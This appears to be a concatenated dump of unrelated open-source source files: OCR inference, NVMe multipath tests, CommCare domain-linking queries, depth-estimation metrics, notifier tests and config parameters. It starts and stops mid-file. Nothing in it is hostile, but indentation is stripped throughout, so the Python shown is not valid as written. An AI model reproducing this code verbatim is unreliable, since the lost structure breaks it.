# Prepare the cab file to be extracted file by file by cabextract (does the heavy lifting)
tmpfd, tmpfile = mkstemp(suffix='.cab')
tmpf = os.fdopen(tmpfd, 'wb')
try:
tmpf.write(buff)
tmpf.close()
EXTRACT_CAB = parse_cab(buff, tmpfile)
finally:
os.remove(tmpfile)
return EXTRACT_CAB
if __name__ == '__main__':
# For testing, s object can be None type if unused in function
print (EXTRACT_CAB(None, sys.stdin.read()))
|
note8/code/infer.py | fluffyrita/LearnPaddle | 367 | 12659047 | <reponame>fluffyrita/LearnPaddle<filename>note8/code/infer.py<gh_stars>100-1000
# coding=utf-8
import gzip
import paddle.v2 as paddle
from network_conf import Model
from reader import DataGenerator
from decoder import ctc_greedy_decoder
from utils import get_file_list, load_dict, load_reverse_dict
def infer_batch(inferer, test_batch, labels, reversed_char_dict):
# 获取初步预测结果
infer_results = inferer.infer(input=test_batch)
num_steps = len(infer_results) // len(test_batch)
probs_split = [
infer_results[i * num_steps:(i + 1) * num_steps]
for i in xrange(0, len(test_batch))
]
results = []
# 最佳路径解码
for i, probs in enumerate(probs_split):
output_transcription = ctc_greedy_decoder(
probs_seq=probs, vocabulary=reversed_char_dict)
results.append(output_transcription)
# 打印预测结果
for result, label in zip(results, labels):
print("\n预测结果: %s\n实际文字: %s" %(result, label))
def infer(model_path, image_shape, label_dict_path,infer_file_list_path):
infer_file_list = get_file_list(infer_file_list_path)
# 获取标签字典
char_dict = load_dict(label_dict_path)
# 获取反转的标签字典
reversed_char_dict = load_reverse_dict(label_dict_path)
# 获取字典大小
dict_size = len(char_dict)
# 获取reader
data_generator = DataGenerator(char_dict=char_dict, image_shape=image_shape)
# 初始化PaddlePaddle
paddle.init(use_gpu=True, trainer_count=2)
# 加载训练好的参数
parameters = paddle.parameters.Parameters.from_tar(gzip.open(model_path))
# 获取网络模型
model = Model(dict_size, image_shape, is_infer=True)
# 获取预测器
inferer = paddle.inference.Inference(output_layer=model.log_probs, parameters=parameters)
# 开始预测
test_batch = []
labels = []
for i, (image, label) in enumerate(data_generator.infer_reader(infer_file_list)()):
test_batch.append([image])
labels.append(label)
infer_batch(inferer, test_batch, labels, reversed_char_dict)
if __name__ == "__main__":
# 要预测的图像
infer_file_list_path = '../data/test_data/Challenge2_Test_Task3_GT.txt'
# 模型的路径
model_path = '../models/params_pass.tar.gz'
# 图像的大小
image_shape = (173, 46)
# 标签的路径
label_dict_path = '../data/label_dict.txt'
# 开始预测
infer(model_path, image_shape, label_dict_path, infer_file_list_path)
|
tools/contributors.py | WarrDaddy/owasp-mstg | 9,156 | 12659079 | import json
import requests
url = 'https://api.github.com/repos/OWASP/owasp-mstg/stats/contributors'
headers = {'Accept' : 'application/vnd.github.v3+json'}
r = requests.get(url, headers=headers)
data = r.json()
coAuthor = "Author/Co-Authors: "
topContributors = "Top Contributors: "
contributors = "Contributors: "
miniContributors = "Mini Contributors: "
additions = ''
for authors in data[:]:
# print(authors['weeks'])
# print(authors['author']['login'])
# print(authors['weeks'])
count = 0
# count additions for each author
for allWeeks in authors['weeks']:
count += allWeeks['a']
if (count >= 2000):
# author = "Co-Author: "+authors['author']['login']
# additions = author + " Additions:" + str(count)
# print(additions)
coAuthor += authors['author']['login']+", "
elif ((count >= 500) and (count <2000)):
# author = "Top Contributors: "+authors['author']['login']
# additions = author + " Additions:" + str(count)
# print(additions)
topContributors += authors['author']['login']+", "
elif ((count >= 50) and (count <500)):
# author = "Contributors: "+authors['author']['login']
# additions = author + " Additions:" + str(count)
# print(additions)
contributors += authors['author']['login']+", "
elif ((count >= 1) and (count <50)):
# author = "Mini Contributors: "+authors['author']['login']
# additions = author + " Additions:" + str(count)
# print(additions)
miniContributors += authors['author']['login']+", "
print(coAuthor+"\n")
print(topContributors+"\n")
print(contributors+"\n")
print(miniContributors+"\n") |
seq2seq_construction/__init__.py | HKUNLP/UnifiedSKG | 191 | 12659097 | <filename>seq2seq_construction/__init__.py
#
# class TrainDataset(Dataset):
#
# def __init__(self, args, raw_datasets):
# # This tab processor is for table truncation and linearize.
# self.raw_datasets = raw_datasets
#
# def __getitem__(self, index) -> T_co:
# raw_data = self.raw_datasets[index]
#
# return raw_data.update({"struct_in": struct_in, "text_in": text_in, "seq_out": seq_out})
#
#
# class DevDataset(Dataset):
#
# def __init__(self, args, raw_datasets):
# # This tab processor is for table truncation and linearize.
# self.raw_datasets = raw_datasets
#
# def __getitem__(self, index):
# raw_data = self.raw_datasets[index]
#
# return raw_data.update({"struct_in": struct_in, "text_in": text_in, "seq_out": seq_out})
#
#
# class TestDataset(Dataset):
#
# def __init__(self, args, raw_datasets):
# # This tab processor is for table truncation and linearize.
# self.raw_datasets = raw_datasets
#
# def __getitem__(self, index):
# raw_data = self.raw_datasets[index]
#
# return raw_data.update({"struct_in": struct_in, "text_in": text_in, "seq_out": seq_out})
|
test/python/tests/ana_client/test_ana_client.py | reitermarkus/mayastor | 236 | 12659116 | import pytest
from common.mayastor import container_mod, mayastor_mod
from common.nvme import (
nvme_connect,
nvme_disconnect,
nvme_disconnect_all,
nvme_list_subsystems,
identify_namespace,
)
import uuid
import mayastor_pb2 as pb
import os
POOL_NAME = "pool1"
NEXUS_GUID = "afebdeb9-ff44-1111-2222-254f810ba34a"
@pytest.fixture
def create_replicas(mayastor_mod):
ms0 = mayastor_mod.get("ms0")
ms1 = mayastor_mod.get("ms1")
replicas = []
for m in (ms0, ms1):
p = m.pool_create(POOL_NAME, "malloc:///disk0?size_mb=100")
assert p.state == pb.POOL_ONLINE
r = m.replica_create(POOL_NAME, str(uuid.uuid4()), 32 * 1024 * 1024)
replicas.append(r.uri)
yield replicas
for m in (ms0, ms1):
try:
m.pool_destroy(POOL_NAME)
except Exception:
pass
@pytest.fixture
def create_nexuses(mayastor_mod, create_replicas):
uris = []
nvme_disconnect_all()
for n in ["ms2", "ms3"]:
ms = mayastor_mod.get(n)
ms.nexus_create(NEXUS_GUID, 32 * 1024 * 1024, create_replicas)
uri = ms.nexus_publish(NEXUS_GUID)
uris.append(uri)
yield uris
nvme_disconnect_all()
for n in ["ms2", "ms3"]:
ms = mayastor_mod.get(n)
ms.nexus_destroy(NEXUS_GUID)
def connect_multipath_nexuses(uris):
dev1 = nvme_connect(uris[0])
dev2 = None
try:
dev2 = nvme_connect(uris[1])
except Exception:
# The first connect is allowed to fail due to controller ID collision.
pass
if dev2 is None:
dev2 = nvme_connect(uris[1])
return (dev1, dev2)
@pytest.mark.asyncio
async def test_io_policy(create_replicas, create_nexuses, mayastor_mod):
devs = connect_multipath_nexuses(create_nexuses)
assert devs[0] == devs[1], "Paths are different for multipath nexus"
# Make sure all we see exactly 2 paths and all paths are 'live optimized'
device = devs[0]
descr = nvme_list_subsystems(device)
paths = descr["Subsystems"][0]["Paths"]
assert len(paths) == 2, "Number of paths to Nexus mismatches"
for p in paths:
assert p["State"] == "live"
assert p["ANAState"] == "optimized"
# Make sure there are 2 virtual NVMe controllers for the namespace.
ns = os.path.basename(device)
for i in range(2):
cname = ns.replace("n1", "c%dn1" % i)
cpath = "/sys/block/%s" % cname
l = os.readlink(cpath)
assert l.startswith(
"../devices/virtual/nvme-fabrics/ctl/"
), "Path device is not a virtual controller"
# Make sure virtual NVMe namespace exists for multipath nexus.
l = os.readlink("/sys/block/%s" % ns)
assert l.startswith(
"../devices/virtual/nvme-subsystem/nvme-subsys"
), "No virtual NVMe subsystem exists for multipath Nexus"
# Make sure I/O policy is NUMA.
subsys = descr["Subsystems"][0]["Name"]
pfile = "/sys/class/nvme-subsystem/%s/iopolicy" % subsys
assert os.path.isfile(pfile), "No iopolicy file exists"
with open(pfile) as f:
iopolicy = f.read().strip()
assert iopolicy == "numa", "I/O policy is not NUMA"
# Make sure ANA state is reported properly for both nexuses.
for n in ["ms2", "ms3"]:
ms = mayastor_mod.get(n)
nexuses = ms.nexus_list_v2()
assert len(nexuses) == 1, "Number of nexuses mismatches"
assert (
nexuses[0].ana_state == pb.NVME_ANA_OPTIMIZED_STATE
), "ANA state of nexus mismatches"
@pytest.mark.asyncio
async def test_namespace_guid(create_replicas, create_nexuses, mayastor_mod):
uri = create_nexuses[0]
device = nvme_connect(uri)
ns = identify_namespace(device)
nvme_disconnect(uri)
# Namespace's GUID must match Nexus GUID.
assert uuid.UUID(ns["nguid"]) == uuid.UUID(
NEXUS_GUID
), "Namespace NGID doesn't match Nexus GUID"
# Extended Unique Identifier must be zero.
assert ns["eui64"] == "0000000000000000", "Namespace EUI64 is not zero"
|
ast/testdata/func_defaults.py | MaxTurchin/pycopy-lib | 126 | 12659154 | <filename>ast/testdata/func_defaults.py
def foo(a, b=1, c=3):
pass
|
corehq/apps/linked_domain/dbaccessors.py | andyasne/commcare-hq | 471 | 12659184 | from django.db.models.expressions import RawSQL
from corehq import toggles
from corehq.apps.accounting.utils import domain_has_privilege
from corehq.apps.domain.models import Domain
from corehq.apps.linked_domain.models import DomainLink, DomainLinkHistory
from corehq.apps.linked_domain.util import (
is_available_upstream_domain,
is_domain_available_to_link,
user_has_admin_access_in_all_domains,
)
from corehq.privileges import RELEASE_MANAGEMENT
from corehq.util.quickcache import quickcache
@quickcache(['domain'], timeout=60 * 60)
def get_upstream_domain_link(domain):
"""
:returns: ``DomainLink`` object linking this domain to its upstream
or None if no link exists
"""
return DomainLink.objects.filter(linked_domain=domain).first()
@quickcache(['domain'], timeout=60 * 60)
def is_active_upstream_domain(domain):
return DomainLink.objects.filter(master_domain=domain).exists()
@quickcache(['domain'], timeout=60 * 60)
def is_active_downstream_domain(domain):
return DomainLink.objects.filter(linked_domain=domain).exists()
@quickcache(['domain'], timeout=60 * 60)
def get_linked_domains(domain, include_deleted=False):
"""
:param domain:
:return: List of ``DomainLink`` objects for each domain linked to this one.
"""
manager = DomainLink.all_objects if include_deleted else DomainLink.objects
return list(manager.filter(master_domain=domain).all())
def get_actions_in_domain_link_history(link):
return DomainLinkHistory.objects.filter(link=link).annotate(row_number=RawSQL(
'row_number() OVER (PARTITION BY model, model_detail ORDER BY date DESC)',
[]
))
def get_available_domains_to_link(upstream_domain_name, user, billing_account=None):
"""
This supports both the old feature flagged version of linked projects and the GAed version
The GAed version is only available to enterprise customers and only usable by admins, but the feature flagged
version is available to anyone who can obtain access (the wild west)
:param upstream_domain_name: potential upstream domain candidate
:param user: user object
:param billing_account: optional parameter to limit available domains to within an enterprise account
:return: list of domain names available to link as downstream projects
"""
if domain_has_privilege(upstream_domain_name, RELEASE_MANAGEMENT):
return get_available_domains_to_link_for_account(upstream_domain_name, user, billing_account)
elif toggles.LINKED_DOMAINS.enabled(upstream_domain_name):
return get_available_domains_to_link_for_user(upstream_domain_name, user)
return []
def get_available_domains_to_link_for_account(upstream_domain_name, user, account):
"""
Finds available domains to link based on domains associated with the provided account
"""
domains = account.get_domains() if account else []
return list({domain for domain in domains
if is_domain_available_to_link(upstream_domain_name, domain, user)})
def get_available_domains_to_link_for_user(upstream_domain_name, user):
"""
Finds available domains to link based on domains that the provided user is active in
"""
domains = [d.name for d in Domain.active_for_user(user)]
return list({domain for domain in domains if is_domain_available_to_link(
upstream_domain_name, domain, user, should_enforce_admin=False)})
def get_available_upstream_domains(downstream_domain, user, billing_account=None):
"""
This supports both the old feature flagged version of linked projects and the GAed version
The GAed version is only available to enterprise customers and only usable by admins, but the feature flagged
version is available to anyone who can obtain access
:param downstream_domain: potential upstream domain candidate
:param user: user object
:param billing_account: optional parameter to limit available domains to within an enterprise account
:return: list of domain names available to link as downstream projects
"""
if domain_has_privilege(downstream_domain, RELEASE_MANAGEMENT):
return get_available_upstream_domains_for_account(downstream_domain, user, billing_account)
elif toggles.LINKED_DOMAINS.enabled(downstream_domain):
return get_available_upstream_domains_for_user(downstream_domain, user)
return []
def get_available_upstream_domains_for_account(downstream_domain, user, account):
domains = account.get_domains() if account else []
return list({d for d in domains if is_available_upstream_domain(d, downstream_domain, user)})
def get_available_upstream_domains_for_user(domain_name, user):
domains = [d.name for d in Domain.active_for_user(user)]
return list({domain for domain in domains
if is_available_upstream_domain(domain, domain_name, user, should_enforce_admin=False)})
def get_accessible_downstream_domains(upstream_domain_name, user):
"""
Returns a list of domain names that actively linked downstream of the provided upstream domain
NOTE: if the RELEASE_MANAGEMENT privilege is enabled, ensure user has admin access
"""
downstream_domains = [d.linked_domain for d in get_linked_domains(upstream_domain_name)]
if domain_has_privilege(upstream_domain_name, RELEASE_MANAGEMENT):
return [domain for domain in downstream_domains
if user_has_admin_access_in_all_domains(user, [upstream_domain_name, domain])]
return downstream_domains
|
python/ql/test/library-tests/exprs/compare/compare.py | vadi2/codeql | 4,036 | 12659192 |
a < b < c
x in y
x not in y
x is y
x is not y
x < y
x > y
x >= y
x <= y
x == y
x != y
|
gossip/util/message_code.py | Gokul1077/PytGossip | 122 | 12659199 | <reponame>Gokul1077/PytGossip<filename>gossip/util/message_code.py
# Copyright 2016 <NAME>, <NAME>, <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__author__ = '<NAME>, <NAME>, <NAME>'
MESSAGE_CODE_ANNOUNCE = 500
MESSAGE_CODE_NOTIFY = 501
MESSAGE_CODE_NOTIFICATION = 502
MESSAGE_CODE_VALIDATION = 503
MESSAGE_CODE_PEER_REQUEST = 510
MESSAGE_CODE_PEER_RESPONSE = 511
MESSAGE_CODE_PEER_UPDATE = 512
MESSAGE_CODE_PEER_INIT = 513
MESSAGE_CODE_GOSSIP_MIN = 500
MESSAGE_CODE_GOSSIP_MAX = 520
|
PIXOR/utils_func.py | mileyan/mileyan | 152 | 12659213 | import torch
import losswise
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
class Metric(object):
def __init__(self):
self.RMSELIs = AverageMeter()
self.RMSELGs = AverageMeter()
self.ABSRs = AverageMeter()
self.SQRs = AverageMeter()
self.DELTA = AverageMeter()
self.DELTASQ = AverageMeter()
self.DELTACU = AverageMeter()
self.losses = AverageMeter()
def update(self, loss, RMSE_Linear, RMSE_Log, abs_relative, sq_relative, delta, delta_sq, delta_cu):
if loss:
self.losses.update(loss)
self.RMSELIs.update(RMSE_Linear)
self.RMSELGs.update(RMSE_Log)
self.ABSRs.update(abs_relative)
self.SQRs.update(sq_relative)
self.DELTA.update(delta)
self.DELTASQ.update(delta_sq)
self.DELTACU.update(delta_cu)
def get_info(self):
return [self.losses.avg, self.RMSELIs.avg, self.RMSELGs.avg, self.ABSRs.avg, self.SQRs.avg, self.DELTA.avg,
self.DELTASQ.avg, self.DELTACU.avg]
def calculate(self, depth, predict, loss=None):
# only consider 1~80 meters
mask = (depth >= 1) * (depth <= 80)
RMSE_Linear = ((((predict[mask] - depth[mask]) ** 2).mean()) ** 0.5).cpu().detach().item()
RMSE_Log = ((((torch.log(predict[mask]) - torch.log(depth[mask])) ** 2).mean()) ** 0.5).cpu().detach().item()
abs_relative = (torch.abs(predict[mask] - depth[mask]) / depth[mask]).mean().cpu().detach().item()
sq_relative = ((predict[mask] - depth[mask]) ** 2 / depth[mask]).mean().cpu().detach().item()
delta = (torch.max(predict[mask] / depth[mask], depth[mask] / predict[mask]) < 1.25).float().mean().cpu().detach().item()
delta_sq = (torch.max(predict[mask] / depth[mask],
depth[mask] / predict[mask]) < 1.25 ** 2).float().mean().cpu().detach().item()
delta_cu = (torch.max(predict[mask] / depth[mask],
depth[mask] / predict[mask]) < 1.25 ** 3).float().mean().cpu().detach().item()
self.update(loss, RMSE_Linear, RMSE_Log, abs_relative, sq_relative, delta, delta_sq, delta_cu)
def tensorboard(self, writer, epoch, token='train'):
writer.add_scalar(token + '/RMSELIs', self.RMSELIs.avg, epoch)
writer.add_scalar(token + '/RMSELGs', self.RMSELGs.avg, epoch)
writer.add_scalar(token + '/ABSRs', self.ABSRs.avg, epoch)
writer.add_scalar(token + '/SQRs', self.SQRs.avg, epoch)
writer.add_scalar(token + '/DELTA', self.DELTA.avg, epoch)
writer.add_scalar(token + '/DELTASQ', self.DELTASQ.avg, epoch)
writer.add_scalar(token + '/DELTACU', self.DELTACU.avg, epoch)
def print(self, iter, token):
string = '{}:{}\tL {:.3f} RLI {:.3f} RLO {:.3f} ABS {:.3f} SQ {:.3f} DEL {:.3f} DELQ {:.3f} DELC {:.3f}'.format(token, iter, *self.get_info())
return string
class LossWise(object):
def __init__(self, key=None, tag=None, epochs=300):
self.key = key
print(self.key)
if len(self.key)>0:
losswise.set_api_key(self.key)
session = losswise.Session(tag=tag, max_iter=epochs)
self.error = session.graph('Error', kind='min', display_interval=1)
self.loss = session.graph('Loss', kind='min', display_interval=1)
self.delta = session.graph('Delta', kind='min', display_interval=1)
self.session=session
def update(self, info, epoch, tag='Train'):
if len(self.key)>0:
self.loss.append(epoch, {tag+'/loss':info[0]})
self.error.append(epoch, {tag+'/RMSE':info[1], tag+'/RMSELog':info[2],
tag+'/ABSR':info[3], tag+'/SQUR':info[4]})
self.delta.append(epoch, {tag+'/1.25':info[5],tag+'/1.25^2':info[6],
tag+'/1.25^3':info[7]})
def done(self):
self.session.done()
class LossWise1(object):
def __init__(self, key=None, tag=None, epochs=300):
self.key = key
print(self.key)
if len(self.key)>0:
losswise.set_api_key(self.key)
session = losswise.Session(tag=tag, max_iter=epochs)
self.error = session.graph('Error', kind='min', display_interval=1)
self.loss_total = session.graph('Loss', kind='min', display_interval=1)
self.delta = session.graph('Delta', kind='min', display_interval=1)
self.session=session
def update(self, info, epoch, tag='Train'):
if len(self.key)>0:
self.loss_total.append(epoch, {tag+'/loss_gt':info[0], tag+'/loss_pseudo':info[1], tag+'/loss_total':info[2]})
self.error.append(epoch, {tag+'/RMSE':info[3], tag+'/RMSELog':info[4],
tag+'/ABSR':info[5], tag+'/SQUR':info[6]})
self.delta.append(epoch, {tag+'/1.25':info[7],tag+'/1.25^2':info[8],
tag+'/1.25^3':info[9]})
def done(self):
self.session.done()
class Metric1(object):
def __init__(self):
self.RMSELIs = AverageMeter()
self.RMSELGs = AverageMeter()
self.ABSRs = AverageMeter()
self.SQRs = AverageMeter()
self.DELTA = AverageMeter()
self.DELTASQ = AverageMeter()
self.DELTACU = AverageMeter()
self.losses_gt = AverageMeter()
self.losses_pseudo = AverageMeter()
self.losses_total = AverageMeter()
def update(self, loss_gt, loss_pseudo, loss_total, RMSE_Linear, RMSE_Log, abs_relative, sq_relative, delta, delta_sq, delta_cu):
self.losses_gt.update(loss_gt)
self.losses_pseudo.update(loss_pseudo)
self.losses_total.update(loss_total)
self.RMSELIs.update(RMSE_Linear)
self.RMSELGs.update(RMSE_Log)
self.ABSRs.update(abs_relative)
self.SQRs.update(sq_relative)
self.DELTA.update(delta)
self.DELTASQ.update(delta_sq)
self.DELTACU.update(delta_cu)
def get_info(self):
return [self.losses_gt.avg, self.losses_pseudo.avg, self.losses_total.avg, self.RMSELIs.avg, self.RMSELGs.avg, self.ABSRs.avg, self.SQRs.avg, self.DELTA.avg,
self.DELTASQ.avg, self.DELTACU.avg]
def calculate(self, depth, predict, loss_gt=0, loss_psuedo=0, loss_total=0):
# only consider 1~80 meters
mask = (depth >= 1) * (depth <= 80)
RMSE_Linear = ((((predict[mask] - depth[mask]) ** 2).mean()) ** 0.5).cpu().data
RMSE_Log = ((((torch.log(predict[mask]) - torch.log(depth[mask])) ** 2).mean()) ** 0.5).cpu().data
abs_relative = (torch.abs(predict[mask] - depth[mask]) / depth[mask]).mean().cpu().data
sq_relative = ((predict[mask] - depth[mask]) ** 2 / depth[mask]).mean().cpu().data
delta = (torch.max(predict[mask] / depth[mask], depth[mask] / predict[mask]) < 1.25).float().mean().cpu().data
delta_sq = (torch.max(predict[mask] / depth[mask],
depth[mask] / predict[mask]) < 1.25 ** 2).float().mean().cpu().data
delta_cu = (torch.max(predict[mask] / depth[mask],
depth[mask] / predict[mask]) < 1.25 ** 3).float().mean().cpu().data
self.update(loss_gt, loss_psuedo, loss_total, RMSE_Linear, RMSE_Log, abs_relative, sq_relative, delta, delta_sq, delta_cu)
def tensorboard(self, writer, epoch, token='train'):
writer.add_scalar(token + '/RMSELIs', self.RMSELIs.avg, epoch)
writer.add_scalar(token + '/RMSELGs', self.RMSELGs.avg, epoch)
writer.add_scalar(token + '/ABSRs', self.ABSRs.avg, epoch)
writer.add_scalar(token + '/SQRs', self.SQRs.avg, epoch)
writer.add_scalar(token + '/DELTA', self.DELTA.avg, epoch)
writer.add_scalar(token + '/DELTASQ', self.DELTASQ.avg, epoch)
writer.add_scalar(token + '/DELTACU', self.DELTACU.avg, epoch)
def print(self, iter, token):
string = '{}:{}\tL {:.3f} {:.3f} {:.3f} RLI {:.3f} RLO {:.3f} ABS {:.3f} SQ {:.3f} DEL {:.3f} DELQ {:.3f} DELC {:.3f}'.format(token, iter, *self.get_info())
return string
def roty_pth(t):
''' Rotation about the y-axis. '''
c = torch.cos(t)
s = torch.sin(t)
return torch.FloatTensor([[c, 0, s],
[0, 1, 0],
[-s, 0, c]])
class torchCalib(object):
def __init__(self, calib, h_shift=0):
self.P2 = torch.from_numpy(calib.P).cuda().float() # 3 x 4
self.P2[1, 2] -= h_shift
# self.P3 = torch.from_numpy(calib.P3).cuda() # 3 x 4
self.R0 = torch.from_numpy(calib.R0).cuda().float() # 3 x 3
self.V2C = torch.from_numpy(calib.V2C).cuda().float() # 3 x 4
self.C2V = torch.from_numpy(calib.C2V).cuda().float()
# Camera intrinsics and extrinsics
self.cu = self.P2[0, 2]
self.cv = self.P2[1, 2]
self.fu = self.P2[0, 0]
self.fv = self.P2[1, 1]
self.tx = self.P2[0, 3] / (-self.fu)
self.ty = self.P2[1, 3] / (-self.fv)
def cart_to_hom(self, pts):
"""
:param pts: (N, 3 or 2)
:return pts_hom: (N, 4 or 3)
"""
ones = torch.ones((pts.shape[0], 1), dtype=torch.float32).cuda()
pts_hom = torch.cat((pts, ones), dim=1)
return pts_hom
def rect_to_lidar(self, pts_rect):
"""
:param pts_rect: (N, 3)
:return pts_lidar: (N, 3)
"""
pts_hom = self.cart_to_hom(torch.matmul(
pts_rect, torch.inverse(self.R0.t())))
pts_rect = torch.matmul(pts_hom, self.C2V.t())
return pts_rect
def lidar_to_rect(self, pts_lidar):
"""
:param pts_lidar: (N, 3)
:return pts_rect: (N, 3)
"""
pts_lidar_hom = self.cart_to_hom(pts_lidar)
pts_rect = torch.matmul(
pts_lidar_hom, torch.matmul(self.V2C.t(), self.R0.t()))
return pts_rect
def rect_to_img(self, pts_rect):
"""
:param pts_rect: (N, 3)
:return pts_img: (N, 2)
"""
pts_rect_hom = self.cart_to_hom(pts_rect)
pts_2d_hom = torch.matmul(pts_rect_hom, self.P2.t())
pts_img = (pts_2d_hom[:, 0:2].t() / pts_rect_hom[:, 2]).t() # (N, 2)
pts_rect_depth = pts_2d_hom[:, 2] - \
self.P2.t()[3, 2] # depth in rect camera coord
return pts_img, pts_rect_depth
def lidar_to_img(self, pts_lidar):
"""
:param pts_lidar: (N, 3)
:return pts_img: (N, 2)
"""
pts_rect = self.lidar_to_rect(pts_lidar)
pts_img, pts_depth = self.rect_to_img(pts_rect)
return pts_img, pts_depth
def img_to_rect(self, u, v, depth_rect):
"""
:param u: (N)
:param v: (N)
:param depth_rect: (N)
:return:
"""
x = ((u - self.cu) * depth_rect) / self.fu + self.tx
y = ((v - self.cv) * depth_rect) / self.fv + self.ty
pts_rect = torch.cat(
(x.reshape(-1, 1), y.reshape(-1, 1), depth_rect.reshape(-1, 1)), dim=1)
return pts_rect
def img_to_lidar(self, u, v, depth_rect):
pts_rect = self.img_to_rect(u, v, depth_rect)
return self.rect_to_lidar(pts_rect)
|
tests/notifier/test_grafana_notifier.py | Connor-Knabe/chiadog | 503 | 12659218 | <reponame>Connor-Knabe/chiadog<gh_stars>100-1000
# std
import os
import unittest
# project
from src.notifier.grafana_notifier import GrafanaNotifier
from .dummy_events import DummyEvents
class TestGrafanaNotifier(unittest.TestCase):
def setUp(self) -> None:
base_url = os.getenv("GRAFANA_BASE_URL")
api_token = os.getenv("GRAFANA_API_TOKEN")
self.assertIsNotNone(base_url, "You must export GRAFANA_BASE_URL as env variable")
self.assertIsNotNone(api_token, "You must export GRAFANA_API_TOKEN as env variable")
self.notifier = GrafanaNotifier(
title_prefix="Test",
config={
"enable": True,
"credentials": {
"base_url": base_url,
"api_token": api_token,
},
},
)
@unittest.skipUnless(
os.getenv("GRAFANA_BASE_URL") and os.getenv("GRAFANA_API_TOKEN"), "Run only if credentials available"
)
def testGrafanaLowPriorityNotifications(self):
success = self.notifier.send_events_to_user(events=DummyEvents.get_low_priority_events())
self.assertTrue(success)
@unittest.skipUnless(
os.getenv("GRAFANA_BASE_URL") and os.getenv("GRAFANA_BASE_URL"), "Run only if credentials available"
)
def testGrafanaNormalPriorityNotifications(self):
success = self.notifier.send_events_to_user(events=DummyEvents.get_normal_priority_events())
self.assertTrue(success)
@unittest.skipUnless(
os.getenv("GRAFANA_BASE_URL") and os.getenv("GRAFANA_BASE_URL"), "Run only if credentials available"
)
def testGrafanaHighPriorityNotifications(self):
success = self.notifier.send_events_to_user(events=DummyEvents.get_high_priority_events())
self.assertTrue(success)
|
sahara/service/validations/edp/data_source.py | ksshanam/sahara | 161 | 12659238 | <gh_stars>100-1000
# Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from oslo_config import cfg
from sahara import conductor as c
from sahara import context
import sahara.exceptions as ex
from sahara.i18n import _
import sahara.service.edp.data_sources.manager as ds_manager
import sahara.service.validations.edp.base as b
CONF = cfg.CONF
def check_data_source_create(data, **kwargs):
b.check_data_source_unique_name(data['name'])
_check_data_source(data)
def _check_datasource_placeholder(url):
if url is None:
return
total_length = 0
substrings = re.findall(r"%RANDSTR\(([\-]?\d+)\)%", url)
for length in map(int, substrings):
if length <= 0:
raise ex.InvalidDataException(_("Requested RANDSTR length"
" must be positive."))
total_length += length
if total_length > 1024:
raise ex.InvalidDataException(_("Requested RANDSTR length is"
" too long, please choose a "
"value less than 1024."))
def _check_data_source(data):
_check_datasource_placeholder(data["url"])
if data["type"] in CONF.data_source_types:
ds_manager.DATA_SOURCES.get_data_source(data["type"]).validate(data)
def check_data_source_update(data, data_source_id):
ctx = context.ctx()
jobs = c.API.job_execution_get_all(ctx)
pending_jobs = [job for job in jobs if job.info["status"] == "PENDING"]
for job in pending_jobs:
if data_source_id in job.data_source_urls:
raise ex.UpdateFailedException(
_("DataSource is used in a "
"PENDING Job and can not be updated."))
ds = c.API.data_source_get(ctx, data_source_id)
if 'name' in data and data['name'] != ds.name:
b.check_data_source_unique_name(data['name'])
check_data = {'type': data.get('type', None) or ds.type,
'url': data.get('url', None) or ds.url,
'credentials': data.get(
'credentials', None) or ds.credentials}
_check_data_source(check_data)
|
tests/test_provider_Ouest_France_ldap.py | mjuenema/python-terrascript | 507 | 12659291 | <filename>tests/test_provider_Ouest_France_ldap.py
# tests/test_provider_Ouest-France_ldap.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:20:59 UTC)
def test_provider_import():
import terrascript.provider.Ouest_France.ldap
def test_resource_import():
from terrascript.resource.Ouest_France.ldap import ldap_group
def test_datasource_import():
from terrascript.data.Ouest_France.ldap import ldap_group
from terrascript.data.Ouest_France.ldap import ldap_user
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.Ouest_France.ldap
#
# t = terrascript.provider.Ouest_France.ldap.ldap()
# s = str(t)
#
# assert 'https://github.com/Ouest-France/terraform-provider-ldap' in s
# assert '0.7.2' in s
|
recipes/Python/577929_PythMultidimensional_List_Searcher_/recipe-577929.py | tdiprima/code | 2,023 | 12659312 | <filename>recipes/Python/577929_PythMultidimensional_List_Searcher_/recipe-577929.py
def find(searchList, elem):
endList = []
for indElem in range(0,len(elem)):
resultList = []
for ind in range(0, len(searchList)):
if searchList[ind] == elem[indElem]:
resultList.append(ind)
endList.extend([resultList])
return endList
|
params.py | dalab/hyperbolic_cones | 103 | 12659327 | from collections import OrderedDict
threads = 24
default_params = OrderedDict([
############ Common params:
('wn', 'noun'), # mammal or noun
('print_every', 20),
('save', False), # Whether to save the model in the folder saved_models/
('num_negative', 10), # Number of negative samples to use
('batch_size', 10), # Size of batch to use for training
('epsilon', 1e-5),
('seed', 0),
('dim', 5),
('opt', 'rsgd'), # rsgd or exp_map or sgd . Used for all hyperbolic models. #### rsgd always better
('where_not_to_sample', 'ancestors'), # both or ancestors or children. Has no effect if neg_sampl_strategy = 'all'.
('neg_edges_attach', 'child'), # How to form negative edges: 'parent' (u,v') or 'child' (u', v) or 'both'
############## Angle loss:
('class', 'HypCones'), # 'EuclCones' , 'HypCones' , 'OrderEmb'
('neg_sampl_strategy', 'true_neg_non_leaves'), ########## true_neg_non_leaves worse than true_neg when init uses true_neg_non_leaves ?????
('lr', 0.0001), ### 1e-4 the best for Hyp cones with rsgd ; 3e-4 better for Eucl cones
